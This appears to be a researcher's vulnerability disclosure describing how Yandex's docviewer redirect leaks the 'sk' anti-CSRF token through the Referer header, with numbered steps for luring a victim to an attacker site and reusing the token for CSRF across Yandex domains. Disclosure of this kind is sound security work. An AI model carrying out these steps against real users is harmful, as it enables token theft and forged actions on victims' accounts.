When you browse a link in docviewer.yandex.com, The site will recreate a token named sk, which is used to validate a redirection and anti-csrf token. sk is also an anti-CSRF token on
http://webmaster.yandex.ru, https://docviewer.yandex.com/r.xml. now If the attacker knows the value of your sk token, he can make a redirection and CSRF attack. How to know the token of the victim ???. Because
http://docviewer.yandex.com/r.xml?sk=thecsrftokenofvictim&url=evilsite useD GET request, the params are showed in URL and it also changeable to https to HTTP. as a result, you can use REFERER HEADER to get the token.
- Upload a document with link or a hyperlink. that hyperlink is the attacker’s site..
- Select the file, Share the link using the share button then get the link
- Browse that link, Then click the view button you will redirect to docviewer.yandex.com
- Change the https to http to allow us to see the referer in our site.
- Send the url to victim and induce him to click the link for attacker’site to able to leak the anti-CSRF token.
now you have his
sk token! that is the bypass!
for csrf →
This is wide CSRF attack which affect other Yandex domain.
list of affected Yandex domain
- m.contact.yandex.com.tr & etc